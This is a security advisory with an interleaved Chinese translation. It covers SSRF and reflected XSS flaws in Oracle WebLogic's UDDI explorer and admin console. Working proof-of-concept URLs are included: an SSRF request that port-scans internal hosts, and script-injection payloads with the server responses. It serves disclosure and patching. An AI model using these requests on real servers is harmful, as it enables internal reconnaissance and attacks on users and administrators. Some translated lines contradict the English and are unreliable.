WebLogic SSRF 漏洞 (简要翻译）

[Ref]http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

WebLogic SSRF and XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)

Monday, March 30, 2015 at 7:51AM

Universal Description Discovery and Integration (UDDI) functionality often lurks（潜伏） unlinked（无连接） but externally accessible on WebLogic servers. It’s trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF). I reported these vulnerabilities to Oracle and they were patched in the July 2014 Critical Patch Update (CPU).

WebLogic 服务器的 UDDI 功能通常很隐蔽，但外部可以访问。利用 weblogic.fuzz.txt 很容易发现该漏洞，但是直到最近才发现容易造成 XSS 和 SSRF 漏洞。我向 Oracle（收购了SUN）报告了该漏洞，厂商在2014年7月的严重补丁更新中进行了修复。

CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6

Oracle WebLogic web server is often both (a) externally accessible; and (b) permitted to invoke connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to cause the WebLogic web server to connect to an arbitrary TCP port of an arbitrary host. Responses returned are fairly verbose and can be used to infer whether a service is listening on the port specified.

Oracle的 WebLogic web服务器通常（a）外部可访问；（b）被允许调用对内部主机的连接。 SearchPublicRegistries.jsp 页面可被未认证的攻击者滥用，造成 WebLogic 服务器连接任意主机的任意端口。其返回信息非常详细，可被攻击者用来推断在指定端口是否有相关服务在监听。

Below is an example request to an internal host which is not listening on TCP port 23:

下面是一个例子：某内部主机未监听TCP 23 端口。

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused

Below is an example request to a host which is listening on TCP port 22:

下面是另一个例子：某内部主机在对TCP 22端口进行监听。

https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.

It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can access. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of the response.

可以使用该功能对 WebLogic 可访问的所有主机端口进行探测。上例中，探测到的服务会返回合法的 SOAP 响应信息，甚至可以看到相应的完整信息。

SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).

CVE-2014-4241 - Reflected Cross Site Scripting in SetupUDDIExplorer.jsp

Affected software: Oracle Fusion Middleware 10.0.2, 10.3.6

User input is reflected into a cookie value (which is set for a year!). This value  is then written into subsequent responses in an unsafe manner, exposing users to Cross Site scripting attacks.

用户的输入被设置到了 cookie 值中（尼玛，居然有效期是1年）。随后，该值以一种不安全的方式被写入后续的所有子请求响应包中，导致用户很容易遭受 XSS 攻击。

This unusual vector circumvents current in-browser anti-XSS controls present in Internet Explorer and Chrome browsers. The vulnerability was present in registration.paypal.com, payflowlink.paypal.com and partnermanager.paypal.com; all were swiftly fixed after I reported this to the PayPal security team.

这种奇葩的攻击向量（vector）可以绕过 IE 和 Chrome 当前内置的防 XSS 模块。该漏洞在 *.paypal.com 都存在，我报告给Paypal安全组之后得到了修复。

Reflected XSS in registration.paypal.com

Example Malicious URL:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

The response sets the privateregistry parameter value previously supplied as a cookie, and redirects the browser back to the SetupUDDIExplorer.jsp page:

HTTP/1.1 302 Moved Temporarily
Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp
Set-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMT
Content-Length: 331
Content-Type: text/html;charset=UTF-8

Redirected Request:

GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1
Host: [vulnerablehost]
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener; consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;

Response Snippet (showing the privateinquiryurls cookie value reflected in an unsafe manner in the response):

<td valign=top width=1%></td>
<td valign=top width=70%>
  <p>
  <h2>Private Registry:</h2>
  <h3>Search URL: <b><script>alert(1)</script></b></h3>
  <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>
  </p>

Example Proof of Concept URLs:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2</script>&setPrivateRegistryPublish=Set+Publish+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL

CVE-2014-4242 - Reflected Cross Site Scripting in consolejndi.portal

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6, 12.1.1, 12.1.2.0.0

I’ve also identified two reflected XSS vulnerabilities in WebLogic’s console application. The console application is intended to manage the WebLogic application server and is not normally externally exposed; as a result, exploitation of this vulnerability would be targeted at admin users.

我还在 WebLogic 的控制台应用中发现了两处 XSS 漏洞。控制台应用被用来管理 WebLogic 应用服务器，通常暴露给外网。结果就是，漏洞利用者可以直接攻击管理员用户。

Example Proof of Concept URL #1 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=
com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")

Response Snippet:

<div class="contenttable"><div class="introText">
<p>Listing of entries found in context <script>alert(1)</script>:</p>
</div>

Example Proof of Concept URL #2 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//

Response Snippet:

<script type="text/javascript">
document.write('<div class="JSTree">');
setBaseDirectory('/console/utils/JStree/images/');
setTaxonomyDelimeter('.');
{
_a = new TreeNode('server', null, 'myserver\u0027);alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);

Remediation

Remove access to UDDI functionality, unless there is business case to support exposing it. Failing that, ensure that the July 2014 CPU has been applied.

修复方案：禁止对 UDDI 功能的访问，除非是业务需要。 确保打了 Oracle 2014年7月的CPU（高危补丁更新)补丁。

Disclosure Timeline
01/12/2013 - Vulnerability Reported
07/16/2014 - Vulnerability Patch Released in Oracle Critical Patch Update (CPU)